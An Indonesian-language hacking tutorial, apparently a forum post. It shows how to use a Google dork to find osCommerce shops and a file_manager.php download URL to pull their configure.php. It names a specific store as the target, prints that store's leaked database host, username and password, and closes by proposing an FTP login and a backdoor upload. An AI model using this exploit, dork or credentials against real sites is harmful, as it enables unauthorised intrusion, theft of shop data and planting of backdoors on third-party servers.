============================================================
#File Disclosure : admin/file_manager.php/login.php?action=download&filename=
#Dork : Powered by osCommerce
#Exploit : admin/file_manager.php/login.php?action=download&filename=/includes/configure.php
==============================================================
#File Disclosure : admin/file_manager.php/login.php?action=download&filename=
#Dork : Powered by osCommerce
#Exploit : admin/file_manager.php/login.php?action=download&filename=/includes/configure.php
==============================================================
Ok, sekarang kita cari targetnya dgn dork “Powered by osCommerce”
Sekarang kita cari target nya dengan memasukkan dork tadi ke google
Contoh target yang saya dapatkan :
Code:
http://rsmjstore.com/admin/login.php
utk percobaan kita pake trget itu...
Dan kita masuk admin page nya ya...
sekarang, kita pake exploitnya jadinya :
Code:
http://rsmjstore.com/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php
nah kita mendapatkan configure.php, lsg aja deh kita download

Selanjutnya, setelah kita download kita buka menggunakan notepad, disitu akan keluar database dan password :
Code:
('DB_SERVER', '10.6.171.62');
define('DB_SERVER_USERNAME', '[color=#FF0000]rsmjmaster[/color]');
define('DB_SERVER_PASSWORD', '[color=#FF0000]Cb81419[/color]');
define('DB_DATABASE', 'rsmjmaster');
define('USE_PCONNECT', 'false');
define('STORE_SESSIONS', 'mysql');
?>
Habis kita dptkan yg kyk gitu, marilah kita buka melalui FTP, di sini saya menggunakan FileZila,
Dan kita Upload backdoor kita